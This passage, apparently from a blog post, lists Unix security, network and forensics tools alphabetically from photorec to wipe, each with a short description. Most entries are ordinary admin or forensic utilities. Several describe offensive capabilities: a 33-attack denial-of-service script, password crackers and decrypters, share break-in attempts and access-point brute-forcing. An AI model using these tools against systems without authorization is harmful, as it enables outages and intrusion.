compressed in gzip or bzip2 format.
photorec – a little tool to recover pictures from digital camera memory.
pnscan – Pnscan is a multi threaded port scanner that can scan a large network very quickly. If does not have all the features that nmap have but is much faster.
pptpd – PoPToP Point to Point Tunneling Server. This implements a Virtual Private Networking Server (VPN) that is compatible with Microsoft VPN clients. It allows windows users to connect to an internal firewalled network using their dialup.
pwl9x – The Windows 9x Password List reader is a UNIX program that will allow you to see the passwords contained in your Windows PWL database. You can check the security of these files and try to recover the main password using brute force methods.
rarpd – Reverse Address Resolution Protocol Daemon. rarpd listens on the ethernet for broadcast packets asking for reverse address resolution. These packets are sent by hosts at boot time to find out their IP address
recover – Undelete files on ext2 partitions
redir – a port redirector, used to forward incoming connections to somewhere else. by far the cleanest piece of code here, because someone else liked it enough to fix it.
revinetd – GNU implementation of the TCP gender changer. It operates in two modes, listen-listen and connect-connect. It can be used to forward traffic through firewalls where outbound rule sets are more liberal than inbound rules.
samba-tng – fork of Samba. It was derived from the same code but is being developed independently.
sara – Security Auditor’s Research Assistant (SARA) is a security analysis tool based on the SATAN model. It is updated frequently to address the latest threats. Checks for common old holes, backdoors, trust relationships, default cgi, common logins.
scanssh – scans a list of addresses and networks for running SSH servers and their version numbers. scanssh supports random selection of IP addresses from large network ranges and is useful for gathering statistics on the deployment of SSH servers in a company or the Internet as whole.
scli – a collection of SNMP command line management tools
screamingcobra – an application for remote vulnerability discovery in ANY UNKNOWN web applications such as CGIs and PHP pages. Simply put, it attempts to find vulnerabilities in all web applications on a host without knowing anything about the applications. Modern CGI scanners scan a host for CGIs with known vulnerabilities. ScreamingCobra is able to ‘find’ the actual vulnerabilities in ANY CGI, whether it has been discovered before or not.
secpanel – A graphical user interface for SSH and SCP
secure_delete – Secure Deletion Utilities
sendip – a commandline tool to send arbitrary IP packets. It has a large number of command line options to specify the content of every header of a TCP, UDP, ICMP, or raw IP packet. It also allows any data to be added to the packet. Checksums can be calculated automatically, but if you wish to send out wrong checksums, that is supported too.
sharefuzz – shared library which automatically detects environment variable overflows in Unix systems. This tool can be used to ensure all necessary patches have been applied, or as a reverse engineering tool.
shiva – tool to encrypt ELF executables under Linux. Shiva can be used to wrap an executable in such a way that though it continues to run as it did before it is very difficult to debug or reverse engineer. Shiva can be used to password protect critical programs, including setuid programs, or simply to obfuscate sensitive data stored within programs.
sing – A fully programmable ping replacement
sleuthkit – collection of open source file system forensics tools that allow one to view allocated and deleted data from NTFS, FAT, FFS, and EXT2FS images. The Autopsy Forensic Browser provides a graphical interface to The Sleuth Kit
slogdump – extracts syslog packets from tcpdump ethernet savefiles
smb-nat – This tool can perform various security checks on remote servers running NetBIOS file sharing services. It is capable of enumerating shares and make break-in attempts using a (user-provided) list of users and passwords.
snapscreenshot – takes a screenshot from a single Linux virtual console (tty) or from a group of ttys.
socat – establishes two bidirectional byte streams and transfers data between them. Data channels may be files, pipes, devices (terminal or modem, etc.), or sockets (Unix, IPv4, IPv6, raw, UDP, TCP, SSL). It provides forking, logging, and tracing, different modes for interprocess communication, and many more options.
spike – Spikeman’s DoS Attack Tool – Revision 5.2. 33 denial of service attacks at once, launched from a 61k shell script! Changes: Never Die Menu Added, new attacks
spikeproxy – functions as an HTTP and HTTPS proxy, and allows the web developer or web application auditor low level access to the entire web application interface, while also providing a bevy of automated tools and techniques for discovering common problems.
splint – tool for statically checking C programs for security vulnerabilities and coding mistakes. With minimal effort, Splint can be used as a better lint. If additional effort is invested adding annotations to programs, Splint can perform stronger checking than can be done by any standard lint.
ssh – Secure rlogin/rsh/rcp replacement
ssldump – SSLv3/TLS network protocol analyzer. It identifies TCP connections on the chosen network interface and attempts to interpret them as SSLv3/TLS traffic. When it identifies SSLv3/TLS traffic, it decodes the records and displays them in a textual form to stdout. If provided with the appropriate keying material, it will also decrypt the connections and display the application data traffic.
strace – a system call trace, a debugging tool which prints out a trace of all the system calls made by another process/program. The program to be traced need not be recompiled for this, so you can use it on binaries for which you don’t have source. System calls and signals are events that happen at the user/kernel interface. A close examination of this boundary is very useful for bug isolation, sanity checking and attempting to capture race and buffer overflow conditions.
stunnel – designed to work as SSL encryption wrapper between remote client and local (inetd-startable) or remote server. The concept is that having non-SSL aware daemons running on your system you can easily setup to communicate with clients over secure SSL channels. stunnel can be used to add SSL functionality to commonly used inetd daemons like POP-2, POP-3 and IMAP servers as well as standalone daemons like NNTP, SMTP and HTTP without changes to the source code.
sudo – a program that provides limited superuser privileges, does not properly handle improper file access attempts, revealing information about file existence.
tcpdump – allows you to dump the traffic on a network. It can be used to print out the headers of packets on a network interface that matches a given expression. You can use this tool to track down network problems, to detect “ping attacks” or to monitor the network activities. Changes: -X option added, telnet command sequence decoder, many bug fixes, SMB printing, NFS parsing, AFS3 packet parsing, etc
tcpflow – a program that captures data transmitted as part of TCP connections (flows), and stores the data in a way that is convenient for protocol analysis or debugging. tcpflow understands TCP sequence numbers and will correctly reconstruct data streams regardless of retransmissions or out-of-order delivery. Each stream is stored in a separate file for later analysis.
tcprelay – aimed at testing the performance of a NIDS by replaying real background network traffic in which to hide attacks. Tcpreplay allows you to control the speed at which the traffic is replayed, and can replay arbitrary tcpdump traces. Unlike programmatically-generated artificial traffic which doesn’t exercise the application/protocol inspection that a NIDS performs, and doesn’t reproduce the real-world anomalies that appear on production networks (asymmetric routes, traffic bursts/lulls, fragmentation, retransmissions, etc.), tcpreplay allows for exact replication of real traffic seen on real networks.
tcpslice – tool for extracting portions of packet trace files generated using tcpdump’s -w flag.
tcptrace – analyzer for tcpdump logfiles.
tct – collection of tools which are geared towards gathering and analyzing forensic data UNIX system after a break-in. TCT features the grave-robber tool which captures information, the ils and mactime tools that display access patterns of files dead or alive, the unrm and lazarus tools that recover deleted files, and the keyfind tool that recovers cryptographic keys from a running process or from files.
tethereal – Network traffic analyzer (console)
thcrut – local network discovery tool developed to brute force its way into wvlan access points. It offers arp-request on ip-ranges and identifies the vendor of the NIC, spoofed DHCP, BOOTP and RARP requests, icmp-address mask request and router discovery techniques. This tool should be ‘your first knife’ on a foreign network.
transproxy – The program is used in conjunction with the Linux Transparent Proxy networking feature, and ipfwadm, to transparently proxy HTTP and other requests.
tsocks – tsocks provides transparent network access through a SOCKS version 4 or 5 proxy (usually on a firewall). tsocks intercepts the calls applications make to establish TCP connections and transparently proxies them as necessary. This allows existing applications to use SOCKS without recompilation or modification.
valgrind – A memory debugger for x86-linux
vmap – utility for fingerprinting services by checking features and replies of bogus commands being fed to the daemon. Currently supports FTP, SMTP, POP3, IMAP, and HTTP.
walker – Compuserve 3.0 Password Decrypter. It decrypts Compuserve 3.0 ini files (cis.ini) that stores account passwords
wipe – Recovery of supposedly erased data from magnetic media is easier than what many people would like to believe. A technique called Magnetic Force Microscopy (MFM) allows any moderately funded opponent recover the last two or three layers of data written to disk. Wipe repeadetly overwrites special patterns to the files to be destroyed, using the fsync() call and/or the O_SYNC bit to force disk access. Changes: Use of /dev/urandom to seed libc’s random() additive feedback pseudo-random generator; a new 32-bit seed is fetched for every 1024 bytes.
Subscribe to:
Posts (Atom)